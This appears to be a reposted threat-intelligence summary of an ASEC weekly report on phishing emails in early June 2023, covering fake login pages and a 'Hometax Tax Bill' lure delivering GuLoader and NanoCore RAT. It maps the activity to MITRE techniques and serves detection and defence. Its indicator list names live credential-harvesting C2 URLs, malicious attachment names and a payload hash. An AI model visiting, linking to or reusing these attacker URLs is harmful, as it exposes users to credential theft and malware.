Threat Research

ASEC Weekly Phishing Email Threat Trends (June 4th 2023 – June 10th, 2023) – ASEC BLOG

Securonix

ASEC tracked phishing email threats focusing on attachments used to deliver malware via downloaders, infostealers, and fake login pages during the week of June 4–10, 2023. The report details attack types, distribution methods, notable cases, and practical user precautions to reduce risk. #GuLoader #NanoCoreRAT #HometaxTaxBill #FakePage

Keypoints

  • The most prevalent phishing attachments were Downloader (37%), Infostealers (29%), FakePages (18%), Trojan (15%), and Exploit (1%).
  • FakePages imitate real login pages to harvest credentials and direct users to attacker C2 servers or fake sites.
  • Attachments used in these campaigns included HTML/HTM/SHTML variants for FakePages and compressed files (RAR, ZIP, GZ, 7Z, etc.) for malware delivery.
  • A notable case involved the “Hometax Tax Bill” theme, where NTS_eTaxInvoice-pdf.zip carried a GuLoader downloader and apparently facilitated NanoCore RAT remote access.
  • FakePage C2 URLs are listed, showing multiple domains used to collect credentials and stage further infection.
  • Keywords to beware include “Hometax Tax Bill,” with guidance to verify sources, avoid executing unfamiliar attachments, and use security software.

MITRE Techniques

  • [T1566] Phishing – Initial access via phishing emails delivering attachments that download loaders/backdoors; “phishing email attacks correspond to the following techniques.”
  • [T1598] Phishing for Information – Reconnaissance via phishing to gather IDs/passwords; “Phishing for Information (Reconnaissance, ID: T1598[1]).”
  • [T1534] Internal Spearphishing – Lateral movement via fake login pages used to harvest credentials; “Internal Spearphishing (Lateral Movement, ID: T1534[3]).”

Indicators of Compromise

  • [URL] C2 domains used by FakePages – regulateantelope.sa.com/slim/fdpxoGur23f.php, regulateantelope.sa.com/funn/fdpxoGur23f.php, and 10 more URLs
  • [Attachment] Malware delivery attachments – NTS_eTaxInvoice-pdf.zip, Tax_Notification.html, and 2 more items
  • [Hash] Trojan/Downloader payload hash – ED9A4BBACD25426E9403E7847619F5BE

Read more: https://asec.ahnlab.com/en/54662/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint